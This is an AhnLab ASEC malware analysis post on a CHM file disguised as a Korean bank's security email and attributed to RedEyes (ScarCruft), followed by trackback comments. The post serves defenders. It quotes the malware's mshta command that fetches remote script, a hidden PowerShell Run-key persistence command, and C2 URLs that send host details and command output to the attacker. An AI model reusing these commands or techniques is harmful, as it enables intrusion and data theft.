CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as the details of the CHM malware’s operation process, is described in the following post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script that exists within the CHM is activated during this process, making it difficult for users to notice. There has been a recent increase in malware distribution using CHM.

Help screen disguised as a security email

The malicious script that’s executed is shown below, and, like the other CHM malware introduced in the past, it also uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command under the Item1 entry is executed. This file executes an additional script that exists within a certain URL through the mshta process.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM

The “1.html” file executed through the mshta process contains a JS (JavaScript) code. This code is responsible for executing the encoded PowerShell commands. The PowerShell command executed here has a similar format as the command used during the aforementioned M2RAT attack process.

1.html file code
Process tree

An examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value, has the same code as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command

When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading files and extorting information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)

[IOC]
8d2eebd10d90953cfada64575328ae24
806fad8aac92164f971c04bb4877c00f

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
Subscribe
Notify of
guest

65 Comments
Inline Feedbacks
View all comments
trackback

[…] chains have been adopted by a North Korean nation-state group known as ScarCruft in attacks aimed at its southern counterpart to backdoor targeted […]

trackback

[…] Similar attack chains have been adopted by a North Korean nation-state group known as ScarCruft in attacks aimed at its southern counterpart to backdoor targeted […]

trackback

[…] chains have been adopted by a North Korean nation-state group generally known as ScarCruft in attacks aimed toward its southern counterpart to backdoor focused […]

trackback

[…] information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last […]

trackback

[…] Other files uploaded to VirusTotal from the same country exhibited a similar initial execution method as described in an AhnLab report.  […]

trackback

[…] Other files uploaded to VirusTotal from the same country exhibited a similar initial execution method as described in an AhnLab report.  […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]

trackback

[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]

trackback

[…] Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This […]

trackback

[…] Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This […]

trackback

[…] Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This […]

trackback

[…] way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. […]

trackback

[…] a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]